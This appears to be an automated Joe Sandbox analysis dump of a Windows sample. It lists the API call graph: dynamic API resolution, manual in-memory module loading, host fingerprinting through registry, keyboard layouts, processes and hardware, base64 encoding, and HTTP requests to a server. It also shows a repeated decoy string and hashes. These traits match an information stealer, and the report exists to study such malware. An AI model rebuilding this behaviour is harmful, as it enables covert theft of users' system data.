lstrcpy 15445->15446 15447 1c267c 15446->15447 15448 1b1590 lstrcpy 15447->15448 15449 1c268d 15448->15449 15993 1c5190 15449->15993 15451 1c2699 15451->13883 16181 1caad0 15452->16181 15454 1b5009 InternetOpenUrlA 15458 1b5021 15454->15458 15455 1b502a InternetReadFile 15455->15458 15456 1b50a0 InternetCloseHandle InternetCloseHandle 15457 1b50ec 15456->15457 15457->13887 15458->15455 15458->15456 16182 1b98d0 15459->16182 15461 1c0759 15462 1c077d 15461->15462 15463 1c0a38 15461->15463 15466 1c0799 StrCmpCA 15462->15466 15464 1b1590 lstrcpy 15463->15464 15465 1c0a49 15464->15465 16358 1c0250 15465->16358 15468 1c07a8 15466->15468 15496 1c0843 15466->15496 15470 1ca7a0 lstrcpy 15468->15470 15471 1c07c3 15470->15471 15473 1b1590 lstrcpy 15471->15473 15472 1c0865 StrCmpCA 15474 1c0874 15472->15474 15476 1c096b 15472->15476 15475 1c080c 15473->15475 15477 1ca740 lstrcpy 15474->15477 15478 1ca7a0 lstrcpy 15475->15478 15479 1c099c StrCmpCA 15476->15479 15480 1c0881 15477->15480 15481 1c0823 15478->15481 15482 1c09ab 15479->15482 15483 1c0a2d 15479->15483 15484 1ca9b0 4 API calls 15480->15484 15486 1ca7a0 lstrcpy 15481->15486 15487 1b1590 lstrcpy 15482->15487 15483->13891 15485 1c08ac 15484->15485 15488 1ca920 3 API calls 15485->15488 15489 1c083e 15486->15489 15490 1c09f4 15487->15490 15492 1c08b3 15488->15492 16185 1bfb00 15489->16185 15491 1ca7a0 lstrcpy 15490->15491 15494 1c0a0d 15491->15494 15495 1ca9b0 4 API calls 15492->15495 15497 1ca7a0 lstrcpy 15494->15497 15498 1c08ba 15495->15498 15496->15472 15499 1c0a28 15497->15499 15500 1ca8a0 lstrcpy 15498->15500 15833 1ca7a0 lstrcpy 15832->15833 15834 1b1683 15833->15834 15835 1ca7a0 lstrcpy 15834->15835 15836 1b1695 15835->15836 15837 1ca7a0 lstrcpy 15836->15837 15838 1b16a7 15837->15838 15839 1ca7a0 lstrcpy 15838->15839 15840 1b15a3 15839->15840 15840->14714 15842 1b47c6 15841->15842 15843 1b4838 lstrlen 15842->15843 15867 1caad0 15843->15867 15845 1b4848 InternetCrackUrlA 15846 1b4867 15845->15846 15846->14791 15848 1ca740 lstrcpy 15847->15848 15849 1c8b74 15848->15849 15850 1ca740 lstrcpy 15849->15850 15851 1c8b82 GetSystemTime 15850->15851 15853 1c8b99 15851->15853 15852 1ca7a0 lstrcpy 15854 1c8bfc 15852->15854 15853->15852 15854->14806 15856 1ca931 15855->15856 15857 1ca988 15856->15857 15859 1ca968 lstrcpy lstrcat 15856->15859 15858 1ca7a0 lstrcpy 15857->15858 15860 1ca994 15858->15860 15859->15857 15860->14809 15861->14924 15863 1b4eee 15862->15863 15864 1b9af9 LocalAlloc 15862->15864 15863->14812 15863->14814 15864->15863 15865 1b9b14 CryptStringToBinaryA 15864->15865 15865->15863 15866 1b9b39 LocalFree 15865->15866 15866->15863 15867->15845 15868->14934 15869->15075 15870->15077 15871->15085 16000 1c77a0 15872->16000 15875 1c1c1e 15875->15167 15876 1c76c6 RegOpenKeyExA 15877 1c7704 RegCloseKey 15876->15877 15878 1c76e7 RegQueryValueExA 15876->15878 15877->15875 15878->15877 15880 1c1c99 15879->15880 15880->15181 15882 1c1e09 15881->15882 15882->15223 15884 1c7a9a wsprintfA 15883->15884 15885 1c1e84 15883->15885 15884->15885 15885->15237 15887 1c7b4d 15886->15887 15888 1c1efe 15886->15888 16007 1c8d20 LocalAlloc CharToOemW 15887->16007 15888->15251 15891 1ca740 lstrcpy 15890->15891 15892 1c7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15891->15892 15893 1c7c25 15892->15893 15894 1c7d18 15893->15894 15895 1c7c46 GetLocaleInfoA 15893->15895 15900 1ca8a0 lstrcpy 15893->15900 15901 1ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15893->15901 15896 1c7d1e LocalFree 15894->15896 15897 1c7d28 15894->15897 15895->15893 15896->15897 15898 1ca7a0 lstrcpy 15897->15898 15899 1c7d37 15898->15899 15899->15264 15900->15893 15901->15893 15903 1c2008 15902->15903 15903->15279 15905 1c94b5 15904->15905 15906 1c9493 GetModuleFileNameExA CloseHandle 15904->15906 15907 1ca740 lstrcpy 15905->15907 15906->15905 15908 1c2091 15907->15908 15908->15294 15910 1c7e68 RegQueryValueExA 15909->15910 15911 1c2119 15909->15911 15912 1c7e8e RegCloseKey 15910->15912 15911->15308 15912->15911 15914 1c7fb9 GetLogicalProcessorInformationEx 15913->15914 15915 1c7fd8 GetLastError 15914->15915 15921 1c8029 15914->15921 15919 1c8022 15915->15919 15923 1c7fe3 15915->15923 15918 1c2194 15918->15322 15919->15918 15920 1c89f0 2 API calls 15919->15920 15920->15918 15922 1c89f0 2 API calls 15921->15922 15924 1c807b 15922->15924 15923->15914 15923->15918 16008 1c89f0 15923->16008 16011 1c8a10 GetProcessHeap RtlAllocateHeap 15923->16011 15924->15919 15925 1c8084 wsprintfA 15924->15925 15925->15918 15927 1c220f 15926->15927 15927->15336 15929 1c89b0 15928->15929 15930 1c814d GlobalMemoryStatusEx 15929->15930 15931 1c8163 __aulldiv 15930->15931 15932 1c819b wsprintfA 15931->15932 15933 1c2289 15932->15933 15933->15350 15935 1c87fb GetProcessHeap RtlAllocateHeap wsprintfA 15934->15935 15937 1ca740 lstrcpy 15935->15937 15938 1c230b 15937->15938 15938->15364 15940 1ca740 lstrcpy 15939->15940 15946 1c8229 15940->15946 15941 1c8263 15943 1ca7a0 lstrcpy 15941->15943 15942 1ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15942->15946 15944 1c82dc 15943->15944 15944->15381 15945 1ca8a0 lstrcpy 15945->15946 15946->15941 15946->15942 15946->15945 15948 1ca740 lstrcpy 15947->15948 15949 1c835c RegOpenKeyExA 15948->15949 15950 1c83ae 15949->15950 15951 1c83d0 15949->15951 15952 1ca7a0 lstrcpy 15950->15952 15953 1c83f8 RegEnumKeyExA 15951->15953 15954 1c8613 RegCloseKey 15951->15954 15963 1c83bd 15952->15963 15955 1c860e 15953->15955 15956 1c843f wsprintfA RegOpenKeyExA 15953->15956 15957 1ca7a0 lstrcpy 15954->15957 15955->15954 15958 1c8485 RegCloseKey RegCloseKey 15956->15958 15959 1c84c1 RegQueryValueExA 15956->15959 15957->15963 15960 1ca7a0 lstrcpy 15958->15960 15961 1c84fa lstrlen 15959->15961 15962 1c8601 RegCloseKey 15959->15962 15960->15963 15961->15962 15964 1c8510 15961->15964 15962->15955 15963->15407 15965 1ca9b0 4 API calls 15964->15965 15966 1c8527 15965->15966 15967 1ca8a0 lstrcpy 15966->15967 15968 1c8533 15967->15968 15969 1ca9b0 4 API calls 15968->15969 15970 1c8557 15969->15970 15971 1ca8a0 lstrcpy 15970->15971 15972 1c8563 15971->15972 15973 1c856e RegQueryValueExA 15972->15973 15973->15962 15974 1c85a3 15973->15974 15975 1ca9b0 4 API calls 15974->15975 15976 1c85ba 15975->15976 15977 1ca8a0 lstrcpy 15976->15977 15978 1c85c6 15977->15978 15979 1ca9b0 4 API calls 15978->15979 15980 1c85ea 15979->15980 15981 1ca8a0 lstrcpy 15980->15981 15982 1c85f6 15981->15982 15982->15962 15984 1ca740 lstrcpy 15983->15984 15985 1c86bc CreateToolhelp32Snapshot Process32First 15984->15985 15986 1c875d CloseHandle 15985->15986 15987 1c86e8 Process32Next 15985->15987 15988 1ca7a0 lstrcpy 15986->15988 15987->15986 15992 1c86fd 15987->15992 15989 1c8776 15988->15989 15989->15439 15990 1ca8a0 lstrcpy 15990->15992 15991 1ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15991->15992 15992->15987 15992->15990 15992->15991 15994 1ca7a0 lstrcpy 15993->15994 15995 1c51b5 15994->15995 15996 1b1590 lstrcpy 15995->15996 15997 1c51c6 15996->15997 16012 1b5100 15997->16012 15999 1c51cf 15999->15451 16003 1c7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 16000->16003 16002 1c76b9 16002->15875 16002->15876 16004 1c7765 RegQueryValueExA 16003->16004 16005 1c7780 RegCloseKey 16003->16005 16004->16005 16006 1c7793 16005->16006 16006->16002 16007->15888 16009 1c8a0c 16008->16009 16010 1c89f9 GetProcessHeap HeapFree 16008->16010 16009->15923 16010->16009 16011->15923 16013 1ca7a0 lstrcpy 16012->16013 16014 1b5119 16013->16014 16015 1b47b0 2 API calls 16014->16015 16016 1b5125 16015->16016 16172 1c8ea0 16016->16172 16018 1b5184 16019 1b5192 lstrlen 16018->16019 16020 1b51a5 16019->16020 16021 1c8ea0 4 API calls 16020->16021 16022 1b51b6 16021->16022 16023 1ca740 lstrcpy 16022->16023 16024 1b51c9 16023->16024 16025 1ca740 lstrcpy 16024->16025 16026 1b51d6 16025->16026 16027 1ca740 lstrcpy 16026->16027 16028 1b51e3 16027->16028 16029 1ca740 lstrcpy 16028->16029 16030 1b51f0 16029->16030 16031 1ca740 lstrcpy 16030->16031 16032 1b51fd InternetOpenA StrCmpCA 16031->16032 16033 1b522f 16032->16033 16034 1b58c4 InternetCloseHandle 16033->16034 16035 1c8b60 3 API calls 16033->16035 16041 1b58d9 codecvt 16034->16041 16036 1b524e 16035->16036 16037 1ca920 3 API calls 16036->16037 16038 1b5261 16037->16038 16039 1ca8a0 lstrcpy 16038->16039 16040 1b526a 16039->16040 16042 1ca9b0 4 API calls 16040->16042 16044 1ca7a0 lstrcpy 16041->16044 16043 1b52ab 16042->16043 16045 1ca920 3 API calls 16043->16045 16053 1b5913 16044->16053 16046 1b52b2 16045->16046 16047 1ca9b0 4 API calls 16046->16047 16048 1b52b9 16047->16048 16049 1ca8a0 lstrcpy 16048->16049 16050 1b52c2 16049->16050 16051 1ca9b0 4 API calls 16050->16051 16052 1b5303 16051->16052 16054 1ca920 3 API calls 16052->16054 16053->15999 16055 1b530a 16054->16055 16056 1ca8a0 lstrcpy 16055->16056 16057 1b5313 16056->16057 16058 1b5329 InternetConnectA 16057->16058 16058->16034 16059 1b5359 HttpOpenRequestA 16058->16059 16061 1b58b7 InternetCloseHandle 16059->16061 16062 1b53b7 16059->16062 16061->16034 16063 1ca9b0 4 API calls 16062->16063 16064 1b53cb 16063->16064 16065 1ca8a0 lstrcpy 16064->16065 16066 1b53d4 16065->16066 16067 1ca920 3 API calls 16066->16067 16068 1b53f2 16067->16068 16069 1ca8a0 lstrcpy 16068->16069 16070 1b53fb 16069->16070 16071 1ca9b0 4 API calls 16070->16071 16072 1b541a 16071->16072 16073 1ca8a0 lstrcpy 16072->16073 16074 1b5423 16073->16074 16075 1ca9b0 4 API calls 16074->16075 16076 1b5444 16075->16076 16077 1ca8a0 lstrcpy 16076->16077 16078 1b544d 16077->16078 16079 1ca9b0 4 API calls 16078->16079 16080 1b546e 16079->16080 16081 1ca8a0 lstrcpy 16080->16081 16173 1c8ead CryptBinaryToStringA 16172->16173 16176 1c8ea9 16172->16176 16174 1c8ece GetProcessHeap RtlAllocateHeap 16173->16174 16173->16176 16175 1c8ef4 codecvt 16174->16175 16174->16176 16177 1c8f05 CryptBinaryToStringA 16175->16177 16176->16018 16177->16176 16181->15454 16424 1b9880 16182->16424 16184 1b98e1 16184->15461 16186 1ca740 lstrcpy 16185->16186 16359 1ca740 lstrcpy 16358->16359 16360 1c0266 16359->16360 16361 1c8de0 2 API calls 16360->16361 16362 1c027b 16361->16362 16363 1ca920 3 API calls 16362->16363 16364 1c028b 16363->16364 16365 1ca8a0 lstrcpy 16364->16365 16366 1c0294 16365->16366 16367 1ca9b0 4 API calls 16366->16367 16425 1b988d 16424->16425 16428 1b6fb0 16425->16428 16427 1b98ad codecvt 16427->16184 16431 1b6d40 16428->16431 16432 1b6d63 16431->16432 16445 1b6d59 16431->16445 16447 1b6530 16432->16447 16436 1b6dbe 16436->16445 16457 1b69b0 16436->16457 16438 1b6e2a 16439 1b6ee6 VirtualFree 16438->16439 16441 1b6ef7 16438->16441 16438->16445 16439->16441 16440 1b6f41 16442 1c89f0 2 API calls 16440->16442 16440->16445 16441->16440 16443 1b6f38 16441->16443 16444 1b6f26 FreeLibrary 16441->16444 16442->16445 16446 1c89f0 2 API calls 16443->16446 16444->16441 16445->16427 16446->16440 16448 1b6542 16447->16448 16450 1b6549 16448->16450 16467 1c8a10 GetProcessHeap RtlAllocateHeap 16448->16467 16450->16445 16451 1b6660 16450->16451 16454 1b668f VirtualAlloc 16451->16454 16453 1b6730 16455 1b673c 16453->16455 16456 1b6743 VirtualAlloc 16453->16456 16454->16453 16454->16455 16455->16436 16456->16455 16458 1b69c9 16457->16458 16462 1b69d5 16457->16462 16459 1b6a09 LoadLibraryA 16458->16459 16458->16462 16460 1b6a32 16459->16460 16459->16462 16463 1b6ae0 16460->16463 16468 1c8a10 GetProcessHeap RtlAllocateHeap 16460->16468 16462->16438 16463->16462 16464 1b6ba8 GetProcAddress 16463->16464 16464->16462 16464->16463 16465 1b6a8b 16465->16462 16466 1c89f0 2 API calls 16465->16466 16466->16463 16467->16450 16468->16465

                              Executed Functions

                              Function 001C9860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 747 1c9860-1c9874 call 1c9750 750 1c987a-1c9a8e call 1c9780 GetProcAddress * 21 747->750 751 1c9a93-1c9af2 LoadLibraryA * 5 747->751 750->751 753 1c9b0d-1c9b14 751->753 754 1c9af4-1c9b08 GetProcAddress 751->754 755 1c9b46-1c9b4d 753->755 756 1c9b16-1c9b41 GetProcAddress * 2 753->756 754->753 758 1c9b4f-1c9b63 GetProcAddress 755->758 759 1c9b68-1c9b6f 755->759 756->755 758->759 760 1c9b89-1c9b90 759->760 761 1c9b71-1c9b84 GetProcAddress 759->761 762 1c9bc1-1c9bc2 760->762 763 1c9b92-1c9bbc GetProcAddress * 2 760->763 761->760 763->762
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00EE0590), ref: 001C98A1
                              • GetProcAddress.KERNEL32(75900000,00EE0608), ref: 001C98BA
                              • GetProcAddress.KERNEL32(75900000,00EE0668), ref: 001C98D2
                              • GetProcAddress.KERNEL32(75900000,00EE05A8), ref: 001C98EA
                              • GetProcAddress.KERNEL32(75900000,00EE0728), ref: 001C9903
                              • GetProcAddress.KERNEL32(75900000,00EE8B48), ref: 001C991B
                              • GetProcAddress.KERNEL32(75900000,00ED53E8), ref: 001C9933
                              • GetProcAddress.KERNEL32(75900000,00ED5348), ref: 001C994C
                              • GetProcAddress.KERNEL32(75900000,00EE0770), ref: 001C9964
                              • GetProcAddress.KERNEL32(75900000,00EE05C0), ref: 001C997C
                              • GetProcAddress.KERNEL32(75900000,00EE07E8), ref: 001C9995
                              • GetProcAddress.KERNEL32(75900000,00EE05D8), ref: 001C99AD
                              • GetProcAddress.KERNEL32(75900000,00ED5388), ref: 001C99C5
                              • GetProcAddress.KERNEL32(75900000,00EE0680), ref: 001C99DE
                              • GetProcAddress.KERNEL32(75900000,00EE05F0), ref: 001C99F6
                              • GetProcAddress.KERNEL32(75900000,00ED52C8), ref: 001C9A0E
                              • GetProcAddress.KERNEL32(75900000,00EE0698), ref: 001C9A27
                              • GetProcAddress.KERNEL32(75900000,00EE0638), ref: 001C9A3F
                              • GetProcAddress.KERNEL32(75900000,00ED5308), ref: 001C9A57
                              • GetProcAddress.KERNEL32(75900000,00EE06B0), ref: 001C9A70
                              • GetProcAddress.KERNEL32(75900000,00ED5208), ref: 001C9A88
                              • LoadLibraryA.KERNEL32(00EE0710,?,001C6A00), ref: 001C9A9A
                              • LoadLibraryA.KERNEL32(00EE06C8,?,001C6A00), ref: 001C9AAB
                              • LoadLibraryA.KERNEL32(00EE06E0,?,001C6A00), ref: 001C9ABD
                              • LoadLibraryA.KERNEL32(00EE07A0,?,001C6A00), ref: 001C9ACF
                              • LoadLibraryA.KERNEL32(00EE0620,?,001C6A00), ref: 001C9AE0
                              • GetProcAddress.KERNEL32(75070000,00EE07B8), ref: 001C9B02
                              • GetProcAddress.KERNEL32(75FD0000,00EE07D0), ref: 001C9B23
                              • GetProcAddress.KERNEL32(75FD0000,00EE8EE8), ref: 001C9B3B
                              • GetProcAddress.KERNEL32(75A50000,00EE8F30), ref: 001C9B5D
                              • GetProcAddress.KERNEL32(74E50000,00ED5248), ref: 001C9B7E
                              • GetProcAddress.KERNEL32(76E80000,00EE8AD8), ref: 001C9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001C9BB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HR$HS$NtQueryInformationProcess$S
                              • API String ID: 2238633743-3386072519
                              • Opcode ID: 7ee4707fb22997789634f4d4d4bf703c289d0c055fd189f09e60ed0bf104c70b
                              • Instruction ID: 59da3e1e7c2c722c766be74a9a198a70ab294529f9a4a0f8879701d3f6512987
                              • Opcode Fuzzy Hash: 7ee4707fb22997789634f4d4d4bf703c289d0c055fd189f09e60ed0bf104c70b
                              • Instruction Fuzzy Hash: B0A166F5600A01AFC346EBA9ED88E723BFDE748381F04851AE60DC3324D779A845DB12
                              Function 001B45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 1b45c0-1b4695 RtlAllocateHeap 781 1b46a0-1b46a6 764->781 782 1b474f-1b47a9 VirtualProtect 781->782 783 1b46ac-1b474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001B479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B477B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 7b773f08b32c9c5cf2b71ac69d1d61b9f1da9439b9e2a2657423348496288b62
                              • Instruction ID: ff456fa3e60f370ab66cd3e2063389409af889ced2bb1754997da20f4d9c034a
